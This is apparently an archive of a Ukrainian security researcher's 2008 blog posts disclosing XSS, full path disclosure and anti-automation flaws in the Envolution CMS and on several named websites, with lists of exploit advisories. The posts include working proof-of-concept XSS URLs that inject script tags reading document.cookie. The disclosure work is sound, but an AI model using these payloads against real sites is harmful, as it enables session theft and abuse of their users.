Архів для категорії 'Уразливості'

Численні уразливості в Envolution

23:53 18.08.2008

Нещодавно, 16.08.2008, після попередніх уразливостей в Envolution, я знайшов нові численні уразливості в системі Envolution, зокрема Insufficient Anti-automation та Cross-Site Scripting. Дірки я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

Insuficient Anti-automation:

Уразливість в user.php (в модулі NS-NewUser).

Envolution Insufficient Anti-automation.html

Можна як через POST, так і через GET:

http://site/user.php?uname=test&upass=12345&upassverif=12345&email=test@test.com&agreetoterms=1&module=NS-NewUser&op=finishnewuser

XSS:

Уразливості в user.php (в модулі NS-NewUser).

http://site/user.php?uname=test&upass=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&upassverif=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&email=test@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&timezoneoffset=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_avatar=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_icq=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_aim=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_msnm=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_from=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_occ=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_intrest=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&user_sig=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&bio=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/user.php?uname=test10&upass=12345&upassverif=12345&email=test10@test.com&agreetoterms=1&module=NS-NewUser&op=confirmnewuser&agreetoterms=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразлива версія Envolution 1.2.0 та попередні версії.

Уразливості на www.stat24.com.ua

20:13 18.08.2008

18.03.2008

У серпні, 24.08.2007, а також додатково сьогодні, я знайшов Full path disclosure та Cross-Site Scripting уразливості на проекті http://www.stat24.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

18.08.2008

Full path disclosure:

http://www.stat24.com.ua/ua/ranking/frazpc.pl

Дана уразливість вже виправлена (але вона все ще зафіксована в кеші Гугла).

XSS:

Уразливості виявив на доменах http://www.stat24.com.ua і http://www.stat24.ru.

Дані уразливості вже виправлені, але виправлені не повністю, тому при невеличкій модифікації одна XSS знову працює ;-) (на обох доменах).

XSS:

http://www.stat24.com.ua

http://www.stat24.ru

Наведені приклади XSS для Mozilla і Firefox. Для IE можуть бути зроблені аналогічні коди.

Уразливості в Envolution

23:55 16.08.2008

Сьогодні я знайшов Cross-Site Scripting та Full path disclosure уразливості в системі Envolution. Дірки я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

XSS:

Уразливість в user.php (в модулі NS-NewUser) в параметрі op.

http://site/user.php?module=NS-NewUser&op=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure:

http://site/user.php?module=NS-NewUser&op=%3Cscript%3E

або

http://site/user.php?op=%22

Уразлива версія Envolution 1.2.0 та попередні версії.

Добірка уразливостей

16:28 16.08.2008

В даній добірці уразливості в веб додатках:

  • php-stats xss whois.php (деталі)
  • Joomla 1.0.12 CMS - Session fixation Issue in backend Administration interface (деталі)
  • FCMS (Family Connections) <= 0.1.1 Remote Command Execution Exploit (деталі)
  • phpDVD v1.0.4 (dvd_config_file) Remote File Include Exploit (деталі)
  • Best Top List Remote File Upload Vulnerability (деталі)
  • 0day Linkliste Version 1.2 Remote File Include by iNs (деталі)
  • Security on AIR: Local file access through JavaScript (деталі)
  • WebEvents: Online Event Registration Template Username Fields SQL INJECTION (деталі)
  • SuskunDuygular - yelik Sistemi v.1 Sql (деталі)
  • Впровадження довільних заголовків в TYPO3 (деталі)

Уразливість на uanic.com.ua

20:27 15.08.2008

17.03.2008

У серпні, 23.08.2007, я знайшов Cross-Site Scripting уразливість на http://uanic.com.ua (http://hostmaster.net.ua) - сайті компанії Хостмайстер. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

15.08.2008

XSS:

POST запит на сторінці http://uanic.com.ua/?nicadv (або на сторінці http://hostmaster.net.ua/?nicadv)
"><script>alert(document.cookie)</script>В полі Person.

Дана уразливість вже виправлена.

Експлоіти для Apache №6

22:37 14.08.2008

Продовжуючи тему експлоітів для Apache, пропоную вам нову добірку експлоітів для цього веб сервера.

Дані експлоіти для уразливостей в Apache mod_jk та Apache Tomcat. Адмінам варто слідкувати за оновленням своїх серверів.

  • Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32) (деталі)
  • Apache Tomcat <= 6.0.18 UTF8 Directory Traversal Vulnerability (деталі)

Добірка уразливостей

16:28 14.08.2008

В даній добірці уразливості в веб додатках:

  • AL-Athkar.v2.0 Remote File Include (деталі)
  • Snif vuln. (деталі)
  • Systme de vote en temps rel v1.0 Remote File include Bug (деталі)
  • Safari for windows remote arbitry file upload (деталі)
  • Safari 3.0.3 (522.15.5) Buffer overflow (деталі)
  • mcNews (skinfile) Remote File Include Vulnerability (деталі)
  • Beautifier Version 0.1 Remote File Include Vulnerability (деталі)
  • Lib2 PHP v0.2 (DOCUMENT_ROOT) Remote File Inclusion Vulnerability (деталі)
  • SOTEeSKLEP Remote File Disclosure Vulnerability (деталі)
  • SQL-ін’єкція в Online Web Building (деталі)

Уразливість на ko.itc.ua

20:33 13.08.2008

14.03.2008

У серпні, 17.08.2007, я знайшов Cross-Site Scripting уразливість на http://ko.itc.ua - cайті журналу “Компьютерное Обозрение” (а також самодостатньому онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію сайта.

До речі, на даному новинному ресурсі також пишуть про безпеку - на сайті є розділ “Сети и безопасность” ;-) . Ще б самі за безпекою власного сайта слідкували.

Останній раз стосовно проектів ITC я писав про уразливості на job.itc.ua.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

13.08.2008

XSS:

До речі, сайт переїхав на новий домен http://ko-online.com.ua.

XSS:

Дана уразливість досі не виправлена.

Уразливість на 1000goods.ru

23:53 12.08.2008

У листопаді, 25.11.2007, я знайшов Cross-Site Scripting уразливість на проекті http://1000goods.ru. Про що найближчим часом сповіщу адміністрацію проекту.

XSS:

Добірка уразливостей

17:33 12.08.2008

В даній добірці уразливості в веб додатках:

  • VisionSoft Audit - Portcullis Security Advisory 06-040 (деталі)
  • VisionSoft Audit - Portcullis Security Advisory 06-041 (деталі)
  • C-SAM oneWallet forget password Cross Site Scripting vulnerability (деталі)
  • VisionProject Multiple XSS vuln. (деталі)
  • EZPhotoSales 1.9.3 Multiple Vulnerabilities (деталі)
  • Envolution (News) <= v1.1.0 Remote SQL Injection (деталі)
  • AuraCMS [Forum Module] - Remote SQL Injection (деталі)
  • ALL vgallite Remote File Include (деталі)
  • AL-Caricatier V.2.5 Remote File Include (деталі)
  • PHP remote file inclusion vulnerability in PBLang (PBL) (деталі)